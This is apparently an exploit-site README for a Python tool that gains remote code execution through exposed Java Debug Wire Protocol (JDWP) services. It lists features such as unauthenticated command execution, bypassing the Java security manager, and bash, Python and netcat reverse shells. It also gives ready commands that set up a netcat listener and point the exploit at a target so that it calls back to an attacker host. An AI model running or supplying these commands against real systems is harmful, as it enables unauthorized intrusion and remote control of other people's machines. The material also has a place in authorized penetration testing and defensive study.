## https://sploitus.com/exploit?id=76B375BE-C7D4-5EAF-AC06-91A22DB4C0B3
## **JDWP Remote Code Execution Exploit**
*A Python 3 implementation of the Java Debug Wire Protocol (JDWP) remote code execution exploit. This tool exploits exposed JDWP services to execute arbitrary code remotely without authentication.*
### **Overview**
*The Java Debug Wire Protocol (JDWP) is a communication protocol used for debugging Java applications. When enabled, it allows debuggers to connect to a running Java Virtual Machine (JVM) to inspect and control the execution of Java programs.*
### **Features**
- **Remote Code Execution**: Execute arbitrary commands on the target system
- **Multiple Payload Types**: Support for bash, Python, and netcat reverse shells
- **OS Fingerprinting**: Automatically detect the target operating system
- **Security Manager Bypass**: Automatically disable Java security manager if present
- **Robust Error Handling**: Includes retry mechanisms and comprehensive error handling
- **Configurable Options**: Flexible configuration for various attack scenarios
### **Usage**
### **Basic Usage**
```bash
python3 jdwp_exploit.py
```
### **Advanced Usage**
```bash
python3 jdwp_exploit.py [options]
```
### **Command Line Options**
| Option | Description | Default |
|--------|-------------|---------|
| `target` | Target host (required) | - |
| `-p, --port` | Target JDWP port | 8000 |
| `-t, --timeout` | Socket timeout in seconds | 10 |
| `-r, --retries` | Number of retries when waiting for events | 10 |
| `--lhost` | Local host for reverse shell | 127.0.0.1 |
| `--lport` | Local port for reverse shell | 4444 |
| `--payload-type` | Type of reverse shell payload | bash |
| `--payload` | Custom payload file path | - |
### **Payload Types**
- **bash**: Bash reverse shell using `/dev/tcp`
- **python**: Python reverse shell
- **nc**: Netcat reverse shell
### **Examples**
### **Exploitation**
```bash
# Basic exploit against default JDWP port
python3 jdwp_exploit.py 192.168.1.100
# Exploit with custom port
python3 jdwp_exploit.py 192.168.1.100 -p 8001
```
### **Reverse Shell**
```bash
# Set up listener first
nc -nlvp 4444
# Execute exploit
python3 jdwp_exploit.py 192.168.1.100 --lhost 192.168.1.50 --lport 4444
# Use Python reverse shell
python3 jdwp_exploit.py 192.168.1.100 --payload-type python --lhost 192.168.1.50 --lport 4444
# Use custom payload
python3 jdwp_exploit.py 192.168.1.100 --payload ./custom_payload.sh
```
### **References**
- [Java Debug Wire Protocol Specification](https://docs.oracle.com/javase/8/docs/technotes/guides/jpda/jdwp-spec.html)
- [JDWP Security Considerations](https://docs.oracle.com/javase/8/docs/technotes/guides/jpda/conninv.html#security)
- [Metasploit JDWP Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_jdwp_debugger.rb)